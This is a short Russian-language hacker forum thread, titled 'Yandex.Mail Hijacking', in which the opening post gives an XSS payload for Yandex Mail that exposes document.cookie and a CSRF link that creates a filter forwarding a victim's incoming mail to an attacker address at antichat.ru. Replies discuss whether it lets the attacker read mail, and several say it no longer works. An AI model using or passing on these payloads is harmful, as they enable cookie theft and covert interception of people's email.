![]() |
Яндекс.Почта Hijacking
1. XSS
При получении письма в html-формате, url картинки из img тэга добавляется в onerror событие. чтобы получить всплывающее окно с cookies, нужно отправить письмо вида Код:
<img src=http://ya.ru/a?');alert(document.cookie+'>При создании почтовых фильтров возможна передача параметров методом get. при этом нет никакой дополнительной проверки. Если пользователь перейдет по ссылке вида Код:
http://mail.yandex.ru/classic/action_setup_filter_create?filter_name=%20&letter=selected&logic=0&field1=from&field2=4&field3=neverwillbereceived&move_folder=%D0%92%D1%85%D0%BE%D0%B4%D1%8F%D1%89%D0%B8%D0%B5&cliker=forward&forward_address=xakep@antichat.ru&forward_with_store=on&order=1 |
То есть, фактичеки это позволит читать письма жертвы?
|
те, которые придут после просмотра жертвой картинки/посещения ссылки -да
|
баян
|
Что-то не работает..Ты сам проверял?
|
честно говоря я сам уже давно не проверял
раньше для создания фильтра на яндексе вроде был важен реферер,гет запрос прокатывал На рамблере например реферер не помню проверяется или нет,вроде нет, но катит только пост запрос,по крайней мере когда это пробовал я.. |
Нече не пашет...
|
| Время: 08:42 |